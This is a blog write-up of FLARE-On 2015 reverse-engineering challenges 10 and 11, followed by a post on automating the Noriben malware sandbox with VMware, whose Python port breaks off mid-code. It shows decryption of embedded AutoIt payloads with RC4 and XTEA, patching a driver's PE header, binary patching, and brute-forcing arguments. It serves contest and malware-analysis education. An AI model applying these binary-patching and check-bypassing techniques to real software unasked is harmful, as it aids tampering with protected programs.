Challenge 10 had a lot of different things going on but, at the end, it came down to a few small gimmick hurdles. Let's get to them one at a time. You're given an executable, loader. When executed it does quite a few things as I'll show in my awesome tool that's on Github and you should contribute to and I totally gave a demo on it at BlackHat 2015 Arsenal, Noriben.


-=] Sandbox Analysis Report generated by Noriben v1.6.2
-=] Developed by Brian Baskin:brian @@ thebaskins.com @bbaskin
-=] The latest release can be found at https://github.com/Rurik/Noriben

-=] Execution time:28.18 seconds
-=] Processing time:0.20 seconds
-=] Analysis time:4.90 seconds

Processes Created:
==================
[CreateProcess]Explorer.EXE:1824 > "C:\FLARE\loader.exe " [Child PID:2700]
[CreateProcess]loader.exe:2700 > "%WinDir%\system32\ioctl.exe 22E0DC" [Child PID:3412]

File Activity:
==================
[CreateFile]loader.exe:2700 > %UserProfile%\Local Settings\Temp\aut1.tmp [File no longer exists]
[CreateFile]loader.exe:2700 > %WinDir%\system32\challenge.sys [MD5:399a3eeb0a8a2748ec760f8f666a87d0] [VT:0/57]
[DeleteFile]loader.exe:2700 > %UserProfile%\Local Settings\Temp\aut1.tmp
[CreateFile]loader.exe:2700 > %UserProfile%\Local Settings\Temp\aut2.tmp [File no longer exists]
[CreateFile]loader.exe:2700 > %WinDir%\system32\ioctl.exe [MD5:205af3831459df9b7fb8d7f66e60884e] [VT:0/57]
[DeleteFile]loader.exe:2700 > %UserProfile%\Local Settings\Temp\aut2.tmp

Registry Activity:
==================
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\Type = 1
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\Start = 3
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\ErrorControl = 1
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\ImagePath = \??\C:\WINDOWS\system32\challenge.sys
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\DisplayName = challenge
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\Security\Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\Enum\0 = Root\LEGACY_CHALLENGE\0000
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\Enum\Count = 1
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\Enum\NextInstance = 1
[RegSetValue]System:4 > HKLM\System\CurrentControlSet\Control\Class\{DDEEAAFF-1337-BEEF-8877-665511223344}\Class = challenge
[RegSetValue]System:4 > HKLM\System\CurrentControlSet\Control\Class\{DDEEAAFF-1337-BEEF-8877-665511223344}\NoDisplayClass = 1
[RegSetValue]System:4 > HKLM\System\CurrentControlSet\Control\Class\{DDEEAAFF-1337-BEEF-8877-665511223344}\NoUseClass = 1
[RegSetValue]System:4 > HKLM\System\CurrentControlSet\Control\Class\{DDEEAAFF-1337-BEEF-8877-665511223344}\Properties\Security = 01 00 0C 90 00 00 00 00 00 00 00 00 00 00 00 00

At a high level, loader.exe is run as PID 2700. It drops aut1.tmp and aut2.tmp to %Temp%. Immediately after each, a file is created in C:\Windows\System32: challenge.sys and ioctl.exe, respectively. Then a service named "challenge" is created (with services.exe:720 shown as the source) that points to challenge.sys. We also then see a new Class created for that service. Finally, loader runs "ioctl.exe" with the argument of 22E0DC.

And those [VT 0/57] ratings? Come on people, you upload your challenges to VirusTotal? That should be an automatic disqualification.

Upon loading loader into IDA, we quickly see that it's the wrong way to go about this:


It's an AutoIt executable, which means there will be an encoded, embedded script. These are extracted automatically with Exe2Aut, which will produce a script that begins with a few hundred lines of code for service management. Discard these; they're generic and copy-pasted from elsewhere. Focus below that:


If @OSArch <> "X86" Then
    MsgBox(0, "Unsupported architecture", "Must be run on x86 architecture")
    Exit
EndIf
If @OSVersion = "WIN_7" Then
    FileInstall("challenge-7.sys", @SystemDir & "\challenge.sys")
ElseIf @OSVersion = "WIN_XP" Then
    FileInstall("challenge-xp.sys", @SystemDir & "\challenge.sys")
Else
    MsgBox(0, "Unsupported OS", "Must be run on Windows XP or Windows 7")
    Exit
EndIf
FileInstall("ioctl.exe", @SystemDir & "\ioctl.exe")
$nret=dothis("0x96c581bc009905e76931875a583f97a738b764eb67f35c802194bf86123b943d1907619488a31a26cf29ba5f5e57ed5c5a37cb5d67dc2020a7e6d55cadefba32aba3ed77f0e18e41a571e74a8a7614a895d7c8827c46028761994543bf449138c65a6e7b5039792c85be5b4998c9950d2497f73cd88d186a6bffe3634bd250ec59e2","flarebearstare")
If $nret Then
    If dothis("0x96d587b8139933d17e3598505e729da736bb66aa6cfa5180289fb6845530", "flarebearstare") Then
        dothis("0x9aee96b50da818d16f368556131aecfc69ef21a440f24fcc6bd1f3bd1e76db69574a6c8d81ed53688a7eaa364e53fd0700", "flarebearstare")
    EndIf
EndIf

Func decrypt($data, $key)
    Local $opcode = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
    Local $codebuffer = DllStructCreate("byte[" & BinaryLen($opcode) & "]")
    DllStructSetData($codebuffer, 1, $opcode)
    Local $buffer = DllStructCreate("byte[" & BinaryLen($data) & "]")
    DllStructSetData($buffer, 1, $data)
    DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($codebuffer), "ptr", DllStructGetPtr($buffer), "int", BinaryLen($data), "str", $key, "int", 0)
    Local $ret = DllStructGetData($buffer, 1)
    $buffer = 0
    $codebuffer = 0
    Return $ret
EndFunc

Func dothis($data, $key)
    $exe = decrypt($data, $key)
    $exe = BinaryToString($exe)
    Return Execute($exe)
EndFunc


This is pretty straightforward. If Win7, drop this; if XP, drop that; otherwise do nothing. Beyond the dropping we see calls to "dothis()" with hex strings and a second argument of "flarebearstare". dothis() simply passes these along to decrypt() and executes the result. decrypt() is the oddball, taking a big string of shellcode and throwing it up into memory.

For now, extract the shellcode, convert to hex, save to file, and open in IDA (which is like three key presses with WinHex, just saying).



A 256 count loop to build an array with byte swapping, followed by a whole other loop that XOR's based on that array? My money's on RC4. Let's whip up a quick Python script with the encoded values and check:


from Crypto.Cipher import ARC4 as cipher
strings=('96D587B8139933D17E3598505E729DA736BB66AA6CFA5180289FB6845530','9aee96b50da818d16f368556131aecfc69ef21a440f24fcc6bd1f3bd1e76db69574a6c8d81ed53688a7eaa364e53fd0700','96c581bc009905e76931875a583f97a738b764eb67f35c802194bf86123b943d1907619488a31a26cf29ba5f5e57ed5c5a37cb5d67dc2020a7e6d55cadefba32aba3ed77f0e18e41a571e74a8a7614a895d7c8827c46028761994543bf449138c65a6e7b5039792c85be5b4998c9950d2497f73cd88d186a6bffe3634bd250ec59e2')
for str in strings:
    dec = cipher.new("flarebearstare")
    print(dec.decrypt(str.decode('hex')))


This results in the output of:

_StartService("", "challenge")
ShellExecute(@SystemDir & "\ioctl.exe", "22E0DC")
_CreateService("", "challenge", "challenge", @SystemDir & "\challenge.sys", "", "", $SERVICE_KERNEL_DRIVER, $SERVICE_DEMAND_START)
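
If you don't have PyCrypto installed, the two loops spotted in the shellcode (a 256-entry array build with swaps, then an XOR loop driven by that array) are short enough to write out by hand. Here is a minimal pure Python 3 sketch of textbook RC4, sanity-checked against the widely published "Key" / "Plaintext" test vector. It is the standard algorithm, not a transcription of the shellcode, and `rc4` is simply my name for it.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    # Key scheduling: the 256-count loop that builds and shuffles the array.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Keystream generation: the second loop that XORs the data.
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

# Published test vector: key "Key", plaintext "Plaintext".
assert rc4(b"Key", b"Plaintext").hex().upper() == "BBF316E8D940AF0AD3"

# Shortest of the three encoded strings from the AutoIt script.
blob = bytes.fromhex("96D587B8139933D17E3598505E729DA736BB66AA6CFA5180289FB6845530")
print(rc4(b"flarebearstare", blob).decode("latin-1"))
```

RC4 is symmetric, so the same function encrypts and decrypts.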

Nice!  Fill back into our original script to get:


If @OSArch <> "X86" Then
    MsgBox(0, "Unsupported architecture", "Must be run on x86 architecture")
    Exit
EndIf
If @OSVersion = "WIN_7" Then
    FileInstall("challenge-7.sys", @SystemDir & "\challenge.sys")
ElseIf @OSVersion = "WIN_XP" Then
    FileInstall("challenge-xp.sys", @SystemDir & "\challenge.sys")
Else
    MsgBox(0, "Unsupported OS", "Must be run on Windows XP or Windows 7")
    Exit
EndIf
FileInstall("ioctl.exe", @SystemDir & "\ioctl.exe")
$nret = Exec(_StartService("", "challenge"))
If $nret Then
    If Exec(ShellExecute(@SystemDir & "\ioctl.exe", "22E0DC")) Then
        Exec(_CreateService("", "challenge", "challenge", @SystemDir & "\challenge.sys", "", "", $SERVICE_KERNEL_DRIVER, $SERVICE_DEMAND_START))
    EndIf
EndIf

Yup, that was a fair bit of work for such anticlimactic results. I'm bored. Let's go look at ioctl.exe.



Welp, that was equally boring. Take a hex value as arg1, pass it along to DeviceIoControl as dwIoControlCode, where the hDevice (v7) is the "FileName" of \\.\challenge. So, take an arg and pass it to a memory-existent driver. Check.
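Since the whole interface to the driver is that one dwIoControlCode, it helps to know how such a value is packed. A small sketch, assuming the standard Windows CTL_CODE layout (device type, access, function, method); the helper name `decode_ioctl` is my own:

```python
def decode_ioctl(code: int) -> dict:
    """Split a 32-bit IOCTL code into the four CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,  # 0x22 is FILE_DEVICE_UNKNOWN
        "access": (code >> 14) & 0x3,          # 1 = read, 2 = write, 3 = both
        "function": (code >> 2) & 0xFFF,       # driver-defined function number
        "method": code & 0x3,                  # 0 is METHOD_BUFFERED
    }


fields = decode_ioctl(0x22E0DC)
print({name: hex(value) for name, value in fields.items()})
```

For 0x22E0DC that works out to device type 0x22, access 3, function 0x837, and method 0.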

Because I'm not a glutton for punishment on non-Fridays, I would typically focus on the XP driver for the rest. However, there's a glitch with that. The dwIoControlCodes in the XP driver are shown as WORD values while the Windows 7 driver shows them as proper DWORDs:



They both have the same functionality so for static analysis the Win7 driver may be more appropriate to use. There are a few things you should see with these drivers. There are 199 referenced functions. Typically, then, I'd sort functions by size and look at the smallest, then the largest. The largest are more fun here...



It's ... so beautiful. m0n0sapiens put it most succinctly:


Or, in a more disco groove:


If you follow the big three functions you'll see that all three end with data pushed into the same function, that feeds into this:



As with any unusual math routine that may be encoding, look for seed values and Google them. In this case, you'll see it referenced as XTEA (eXtended Tiny Encryption Algorithm), a well-known routine. At the end of each of those three routines is a buffer passed into this decryptor. But how is each one called?

In this case, there is a single subroutine with a switch statement of 101 cases, each a DWORD value. If we find the one used by the dropper we see it pointing to the large "Triangle" routine. I'll point it out below along with the other three large ones (which I'll name Parse1, Parse2, and Parse3). I've modified this image to remove cruft:



Here we see the code sent from the dropper: 22E0DC, which points to that massive triangle function. Others have written up details of this function and how it works. I skipped it. It had no meaningful calls from it and wasn't related to the XTEA decryption routine, so I put it on the backburner.

I focus on the XTEA and work back. For each Parse routine this decryptor is called with a buffer of data and a buffer size. That size is slightly obfuscated just because it is set at the very beginning in a mess of other values. I'll do some magic photoshopping to demonstrate these.



Parse1() calls the decryptor with a 40 (0x28) byte buffer while the other two call it with an 80 (0x50) byte buffer. Each buffer is made up of individual global bytes that are created from subroutines underneath each Parse() routine. The obvious and professional route is clear from a static perspective. Follow the xrefs back from each byte, grab the value, and populate it into the binary.
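For the static route, once the bytes are recovered you still need to run them through the cipher. Here is a rough sketch of textbook XTEA over such a buffer. Big assumptions, none of them confirmed against the driver: 32 rounds, little-endian 32-bit words, each 8-byte block handled independently, and a key you supply yourself. The function names are my own.

```python
import struct

DELTA = 0x9E3779B9  # the constant you would end up Googling
MASK = 0xFFFFFFFF


def _mix(v, total, k):
    # One XTEA half-round term, truncated to 32 bits like the C original
    return ((((v << 4) ^ (v >> 5)) + v) ^ (total + k)) & MASK


def xtea_encrypt_block(v0, v1, key, rounds=32):
    total = 0
    for _ in range(rounds):
        v0 = (v0 + _mix(v1, total, key[total & 3])) & MASK
        total = (total + DELTA) & MASK
        v1 = (v1 + _mix(v0, total, key[(total >> 11) & 3])) & MASK
    return v0, v1


def xtea_decrypt_block(v0, v1, key, rounds=32):
    total = (DELTA * rounds) & MASK
    for _ in range(rounds):
        v1 = (v1 - _mix(v0, total, key[(total >> 11) & 3])) & MASK
        total = (total - DELTA) & MASK
        v0 = (v0 - _mix(v1, total, key[total & 3])) & MASK
    return v0, v1


def xtea_decrypt_buffer(buf, key):
    """Decrypt a buffer whose length is a multiple of 8 (e.g. 0x28 or 0x50)."""
    out = bytearray()
    for off in range(0, len(buf), 8):
        v0, v1 = struct.unpack_from("<2I", buf, off)
        out += struct.pack("<2I", *xtea_decrypt_block(v0, v1, key))
    return bytes(out)
```

The key is passed as four 32-bit integers. If the output is garbage, the word order or the round count is the first thing I would flip.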

That's what others did. That's not how I roll. Let's do this live in a debugger. Our hurdle here is to attach to a device driver in memory. That would typically involve using WinDbg at a kernel level, which I do not know how to do (it's on my bucket list, trust me, right below base jumping in South America). I don't need to run it properly, I just need to throw it in memory for me to mess with.

So, I use CFF Explorer to modify the PE header, change the Subsystem to a DLL, and save it. I then debug rundll32.exe with an argument calling this new "DLL". It works!
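If you'd rather script that header edit than click through CFF Explorer, here is a sketch using only the standard library. Exactly which fields need to change is my assumption: this version sets the IMAGE_FILE_DLL characteristic and switches the Subsystem to Windows GUI, and it does not recompute the PE checksum. The function name is hypothetical.

```python
import struct

IMAGE_FILE_DLL = 0x2000
IMAGE_SUBSYSTEM_WINDOWS_GUI = 2


def patch_driver_as_dll(image: bytes) -> bytes:
    """Return a copy of a PE image flagged as a GUI-subsystem DLL."""
    data = bytearray(image)
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]  # e_lfanew
    if data[:2] != b"MZ" or data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    chars_off = pe_off + 4 + 18    # FILE_HEADER.Characteristics
    subsys_off = pe_off + 24 + 68  # OPTIONAL_HEADER.Subsystem
    chars = struct.unpack_from("<H", data, chars_off)[0]
    struct.pack_into("<H", data, chars_off, chars | IMAGE_FILE_DLL)
    struct.pack_into("<H", data, subsys_off, IMAGE_SUBSYSTEM_WINDOWS_GUI)
    return bytes(data)
```

Read the .sys file in binary mode, pass the bytes through, and write the result out under a new name before pointing rundll32.exe at it.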



I take the entry point as it appears in the debugger (0x9C0000) and rebase IDA. Now I can directly see where changes and calls are made. However, as I quickly learn, I have many errors in actually running this. The memory segments that it is loaded in are Executable only. So, in Immunity, switch to the memory map view and just set them all as Full Access.  (Didn't I warn you about how ghetto I was going to make this? You haven't seen anything yet!)



I throw calls to the three Parse() routines and notice that Parse1() ends with a blank buffer. Passing it into TEA fills it with garbage. I try to place data into the buffer, different junk comes back. This must be an INOUT buffer. But it's not populated at all. I trace the calls to populate these bytes back, set a few breakpoints, and see that they're never called. There are 40 conditions that are never met. From a debugger POV I can now try to change those conditions, or BP at each and change the Z flag. Or I can make ghetto calls (my personal favorite).

While in ntoskrnl space, just because I was arbitrarily sitting there, I pull the xref from each subroutine in IDA and just ... call them. One at a time. And watch the buffer fill. You can ghetto call because there are no arguments to pass in and no results back. It doesn't break the stack ... much.



I then call Parse1(), track it to the end, make the call, and get my email address:


unconditional_conditions@flare-on.com

You cringe at how I did that, but I got it done in just a few hours, so phooey on you.

Filename Etymology: loader / challenge-7.sys / challenge-xp.sys
I am disappoint. How about: driving_mr_pythagoras? dantes_inferno? Let's brainstorm this, people.


Challenge #11


This is the final challenge and it shows. With the exception of the issues with #6, this sample took me the longest out of all challenges from this year and last. There is a lot going on. And, being honest, the other write-ups will explain this challenge much better than I and will provide more professional answers. Read at your own risk.

The executable, CryptoGraph, contains fairly customized encryption that is seeded by a command line argument to decrypt an embedded resource into, ultimately, a JPG. For one, I'm glad they used JPG so that we could avoid the whole GIF vs JIF debate.

Part One of this challenge is processing the command line argument directly against embedded data to produce a new set of data. This data will vary based on the argument passed and how many times it had to verify the data contents.

Part Two takes the results of Part One to seed an RC5 decryption of another embedded resource to the disk.

This seems fairly straightforward. We can brute force the command line options until we get a JPG. This is quite similar to the final challenge last year. However...


  1. The runtime duration of this application is approximately 15-20 hours.
  2. Even with the correct command line argument, the correct number of data loops needs to be determined. Running to the end will produce a garbage JPG.


Knowing that, I can see where people can write debugger scripts to fuzz registers or values at certain points. But, I have my limitations. I'm going straight in through the front door. That begins, however, with understanding what's going on. Therefore I spend a few days doing nothing but debugging, following traces, and keeping notes. A LOT of notes.



Based on such notes, I'm proud to share one of the worst ways possible of finishing this challenge successfully.

For one, now that I've read other write-ups, I feel foolish in missing one of the very first checks for a null value at 0x401714. Instead, I focused far past that. The issue here is that there are three distinct ways to view code in IDA: hex view, graph view, and decompiler view. Due to the sheer size of many functions I remained in hex view and decompiler view. However, as others learned during this challenge, graph view made it very easy to track unusual jumps past certain areas that should be reached. Lesson learned.

When checking for the first argument there is an early loop where the correct argument will match a value from the embedded resource and then skip to the rest. If it doesn't match, a global integer (which I've named Data_Checks) is incremented, and the process continues.

Past this is the main loop of the program, shown below, that repeats 32 times. Each time, the speed becomes slower and slower, based on the v16 value passed into Core_Decoding_Loops(), which often numbers in the millions.


do // Main Loop
{
    v16 = *(v15 - 44) + v31[398] * (result >> 4);
    v31[398] = v16;
    create_16byte_key(&v32);
    MD5_Chunks(&v32, (v15 - 40), 8);
    MD5_chunk_and_byteswap(&v32, &v36);
    Core_Decoding_Loops(&v34, &v36, v17, (v15 - 40 + 8), v17, v16, 1);
    memcpy_s(&Dst, 16u, &v34, 16u);
    v18 = v30;
    v25 = v30 + v31[5];
    v26 = 2 * v25 + 2;
    v24 = Malloc(4 * v26 | -(v26 >> 30 != 0));
    if (v24)
    {
        EQUATION_RC6_Setup(&v24);
        EQUATION_RC6(&v24, &Dst, 16);
    }
    RoundNum_of32 = v18 + 1;
    loop48_round = v27 + 1;
    v29 = v18 + 1;
    do
    {
        Loop1_48(&v24, v15, v15, 48, &RoundNum_of32);
        --loop48_round;
    }
    while (loop48_round);
    if (*v15 == v18)
    {
        create_16byte_key(&v32);
        MD5_Chunks(&v32, v15, 32);
        MD5_chunk_and_byteswap(&v32, &v35);
        v20 = (v15 + 32);
        v21 = 12;
        v22 = &v35;
        while (*v22 == *v20)
        {
            v22 += 4;
            ++v20;
            v13 = v21 < 4;
            v21 -= 4;
            if (v13)
                goto LABEL_24;
        }
    }
    ++Data_Checks;
LABEL_24:
    if (v24)
        j__free(v24);
    v15 += 48;
    result = RoundNum_of32;
    v23 = __ROL4__(v27, 1);
    v30 = RoundNum_of32;
    v27 = v23;
}
while (RoundNum_of32 < 32);


There are a few references to incrementing Data_Checks and I tried my hardest to make sure the flow got to that value. After every loop that number incremented, which I took to be a good thing. (Spoiler Alert: It wasn't).

For example, in this flow graph, I continually tried to follow the cyan (blue) lines leading to Data_Checks.



After following all of the logic at this point, things started to make sense. The continual iterations were due to data not being found at certain offsets of the resource during each round of modifications. There appeared to be at least one exit condition on the loops that would prevent continuous processing at certain points. A proper command line argument should make the data shift correctly to break out of  such loops and speed up code execution. But, how do we test that theory?

There are many proper ways of doing it. Instead, here was mine: Find the slowest computing procedure and, once it completes, patch the program to quit. Then brute force and see which number makes it end the soonest. For this, I chose to end immediately after that Core_Decoding_Loops(). Through standard execution, getting from the beginning and past that loop with an arbitrary argument would take two minutes. That sounded like a good spread. I went to the instruction after that call, used Immunity to change the code to "call _cexit" and patched the resulting bytes into the executable.

I wrote a quick Python script to brute force the numbers, timing out any process longer than 60 seconds, and waited.


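import subprocess

seconds = 60

for i in range(0, 255):  # Honestly, I broke this up into 6 simultaneous scripts to run faster
    cmd = 'breakme.exe %d' % i
    print(cmd)
    try:
        stdout = subprocess.check_output(cmd, stderr=subprocess.STDOUT, timeout=seconds)
    except subprocess.TimeoutExpired:
        pass
    except subprocess.CalledProcessError as err:
        # The patched binary dies with a nonzero exit code rather than exiting cleanly
        print('%s exited early with code %d' % (cmd, err.returncode))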


Now, first, this is not the proper way of doing that. Second, that patch doesn't make the program actually exit, it just crashes it with an unknown software exception (0xc0000417). So I'd have a ton of numbers do nothing and a small handful that crashed.

Of the three command line arguments that crashed in under 60 seconds (205, 238, 240), 205 was unique in reaching that point in literally less than a second. That seemed odd enough to investigate further.
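If I were doing this again, I'd have the script record how long each run took instead of eyeballing it. A sketch of that idea, with hypothetical helper names and the same 60-second cutoff; `breakme.exe` is the patched binary from above:

```python
import subprocess
import time


def time_run(argv, timeout=60):
    """Run one command; return elapsed seconds, or None if it timed out."""
    start = time.monotonic()
    try:
        subprocess.run(argv, stdout=subprocess.DEVNULL,
                       stderr=subprocess.DEVNULL, timeout=timeout)
    except subprocess.TimeoutExpired:
        return None
    return time.monotonic() - start


def rank_arguments(exe, candidates, timeout=60):
    """Return (seconds, argument) pairs for runs that finished, fastest first."""
    results = []
    for arg in candidates:
        elapsed = time_run([exe, str(arg)], timeout)
        if elapsed is not None:
            results.append((elapsed, arg))
    return sorted(results)
```

Something like `rank_arguments("breakme.exe", range(0, 255))[:5]` would then list the quickest finishers, and an outlier that ends in under a second should jump right out.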

Using 205 as an argument changed the entire outlook of the program. Now, early checks that would increase the Data_Checks global value were skipped. On the very first pass, at 0x4016D4, a routine to ROR and XOR data was tested to ensure that the first DWORD was all nulls. Without a proper command line argument, it would appear similar to this:



However, once given 205, it produced:



Every additional check would also produce expected results, skipping large amounts of number crunching. Additionally, the Data_Checks value was never incremented. This value counts the number of loops in which the data validation failed, suggesting that this value should always stay null.

The second part of this challenge was determining that after every large round of computation, shown in pseudocode earlier, the data is re-encoded. As this data is integral to the second part, it needs to be correct before sending it back.  From letting the program run with '205' on a second computer overnight (12 hours to run), I discovered that it would produce a garbage JPG by default. Therefore, we need to break out of this loop before it reaches 32 rounds. But, how many rounds do we let it run?

Others found the clean answer to this problem by examining comparisons on the back end. Me? I had a jug of sangria and time to kill on a Saturday afternoon. So, I manually brute forced it while catching up on my Black Butler episodes. It turns out that it didn't take that long.

At the end of each round of checks I set a breakpoint and disabled all the earlier ones. I would run to this CMP EAX, 20 (hex 20, the 32-round limit) then, at the following JB, just change the C flag to cause it to break out of the loop.



Each round produced junk JPGs until I hit round 10, opened the JPG expecting another round of garbage, and screamed like a teenage girl at a Justin Bieber concert. There I saw some sort of SportsBall player with an email!


Cryptol0gists_h8_him@flare-on.com

Filename Etymology: CryptoGraph
Again. Let's think about this. spin_me_right_round. grab_some_popcorn. one_bit_hahaha_two_bits_hahaha. ...


After sending off the email I tried to figure out who this was and why he was there. TinEye reports him as Lionel Messi who is apparently a good SportsBall player. Or, is he?



There you have it. This was an amazingly fun challenge (except #6) and I learned much along the way. I am now prepared to go back and re-do the challenges using the methods detailed by others. My methods tend to be very brute-force-ish, very 'mess with things in memory until they work', CTF-speed hacks. But I am slowly forcing myself to learn the proper methods: WinDbg/GDB scripts, PIN tracing, more IDAPython, debugger memory fuzzing.


How often in life we complete a task that was beyond the capability of the person we were when we started it.
—  Robert Brault


The Prize

Last year FLARE presented each winner with a serialized challenge coin (RMO) for their completion order. I received coin 0x83 (#131). This year they changed it up a bit and introduced ... a FLARE belt buckle!

Jokes aside, it's an awesome design and is self-supporting.




Additional Write-Ups

FireEye's Official Solutions
Topher Timzen's A Successful Yet Failed Flare ON Challenge - The Write-up
AcidShout's 2015 FLARE-ON challenges writeup
Reno Robert's v0ids3curity writeup
Mohamed Shetta's FLARE On 2015 Walkthrough
z3r0zh0u's XLOYE Write Ups
Julien Perrot Flare On 2 write-up
A Disturbing Lack of Taste Challenges #7 and #8
0x0A Tang Solving for Hashes in Flare-On #5


Did you find benefit or enjoyment from this post? Was it a waste of your time? Please, leave feedback! I'm open to critiques, criticisms, and attaboys.  If you like it, I'll keep creating them. Though, next time, a more Forensics related one.

Creating a Malware Sandbox in Seconds with Noriben.

Happy New Year!

As part of the new year, let's make an effort to make your defensive posture better, especially through quicker and more effective malware analysis! A few years ago I created a sample malware analysis sandbox script to use for the analysis and reverse engineering that I performed on a daily basis. Let's show how you can perform analysis of malware within just a few seconds with almost no setup at all.

  1. Introduction
  2. Automating Sandboxing with VMware
  3. How you can help! Even with no technical background!
  4. Download Information

For those who are already familiar with Noriben, feel free to skip to the second section to see the new content.

Introduction


If you've followed me on Twitter, or kept up with this blog, you would be familiar with Noriben. If not, it's a very simple script. In typical behavior analysis one would run malware within a sandbox to see exactly what files it creates, what processes it runs, and what changes it makes to the system. The most common approach for many defense teams is to upload the file to a central anti-virus testing site like VirusTotal and to online sandboxes like Malwr and those using Cuckoo.

Some teams are leery of uploading their files to the Internet, and doing so is especially inadvisable for APT-related investigations. Advanced actors monitor online sites to see if their files are uploaded, which tells them that their free rein within the environment has come to an end and an IR response has started.

Running malware locally is most commonly performed through Cuckoo, an awesome and open-source sandbox application designed for malware that produces very comprehensive results. However, there is arguably considerable effort required to set up Cuckoo correctly, with multiple sites offering walkthroughs for various environments. While relatively easy to install on Linux, installing on Windows or OSX can be frustrating for many. And, in my case, I'm often on the road with a random laptop and need to make a sandbox very quickly.

If you take a malware analysis training course, you've also likely been exposed to the SysInternals Procmon tool to monitor a system's environment. For those with more vintage knowledge, you learned Regmon and Filemon. Others use Regshot, a tool that is inadequate for much malware as it doesn't track fine-grained changes during runtime.

Noriben is a simple wrapper for Procmon that collects hundreds of thousands of events, then uses a custom set of whitelisted system events to reduce this down to a few dozen for quick review. For more, take a look at the slide deck I put together for the 2015 Black Hat Arsenal:





This post won't really focus on the details of the tool itself. You can check out its main page here: www.ghettoforensics.com/noriben

Automating Sandboxing from VMware


Typical usage of Noriben requires that you run it interactively within a sandbox while running your malware. After running Noriben, it collects overall system artifacts as you run malware. Many analysts use it to collect malware indicators for when they need to interact with the malware within the sandbox, such as with this video that does VM checking:


However, this blog post is to highlight an automated way to avoid this and to submit samples, and receive the resulting reports, directly from your host system.

By using VMware's vmrun command, the script will revert the VM to a known snapshot, copy the malware in, run Noriben, then zip and extract the report out. From the command line, one can receive a malware report within 60 seconds on a file. Below is an example of the bash script that runs from OSX:



#!/bin/bash
# Noriben Sandbox Automation Script
# Responsible for:
# * Copying malware into a known VM
# * Running malware sample
# * Copying off results
#
# Ensure you set the environment variables below to match your system
if [ ! -f "$1" ]; then
    echo "Please provide executable filename as an argument."
    echo "For example:"
    echo "$0 ~/malware/ef8188aa1dfa2ab07af527bab6c8baf7"
    exit 1
fi

DELAY=10
MALWAREFILE=$1
VMRUN="/Applications/VMware Fusion.app/Contents/Library/vmrun"
VMX="/Users/bbaskin/VMs/RSA Victim.vmwarevm/Windows XP Professional.vmx"
VM_SNAPSHOT="Baseline"
VM_USER=Administrator
VM_PASS=password
FILENAME=$(basename "$MALWAREFILE")
NORIBEN_PATH="C:\\Documents and Settings\\$VM_USER\\Desktop\\Noriben.py"
ZIP_PATH=C:\\Tools\\zip.exe
LOG_PATH=C:\\Noriben_Logs


"$VMRUN" -T ws revertToSnapshot "$VMX" $VM_SNAPSHOT
"$VMRUN" -T ws start "$VMX"
"$VMRUN" -gu $VM_USER -gp $VM_PASS copyFileFromHostToGuest "$VMX" "$MALWAREFILE" C:\\Malware\\malware.exe
"$VMRUN" -T ws -gu $VM_USER -gp $VM_PASS runProgramInGuest "$VMX" C:\\Python27\\Python.exe "$NORIBEN_PATH" -d -t $DELAY --cmd "C:\\Malware\\Malware.exe" --output "$LOG_PATH"
if [ $? -gt 0 ]; then
    echo "[!] File did not execute in VM correctly."
    exit 1
fi
"$VMRUN" -T ws -gu $VM_USER -gp $VM_PASS runProgramInGuest "$VMX" "$ZIP_PATH" -j C:\\NoribenReports.zip "$LOG_PATH\\*.*"
if [ $? -eq 12 ]; then
    echo "[!] ERROR: No files found in Noriben output folder to ZIP."
    exit 1
fi
"$VMRUN" -gu $VM_USER -gp $VM_PASS copyFileFromGuestToHost "$VMX" C:\\NoribenReports.zip "$PWD/NoribenReports_$FILENAME.zip"

Obviously, this script needs minor editing on your part to establish the correct paths. By default it places the malware sample as "C:\Malware\malware.exe", runs Noriben off the desktop of the Administrator account, and outputs the results to "C:\Noriben_Logs\".
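If you'd rather drive this from Python than from a shell, the same sequence can be laid out as a list of vmrun invocations. This is only a sketch: it reuses the vmrun commands and guest paths from the script above, while the function names and the default output filename are hypothetical.

```python
import subprocess


def build_vmrun_steps(vmrun, vmx, sample, user, password,
                      snapshot="Baseline", delay=10,
                      out_zip="NoribenReports.zip"):
    """Return the vmrun invocations, in order, as argv lists."""
    auth = ["-gu", user, "-gp", password]
    guest_sample = "C:\\Malware\\malware.exe"
    guest_zip = "C:\\NoribenReports.zip"
    logs = "C:\\Noriben_Logs"
    noriben = "C:\\Documents and Settings\\" + user + "\\Desktop\\Noriben.py"
    return [
        [vmrun, "-T", "ws", "revertToSnapshot", vmx, snapshot],
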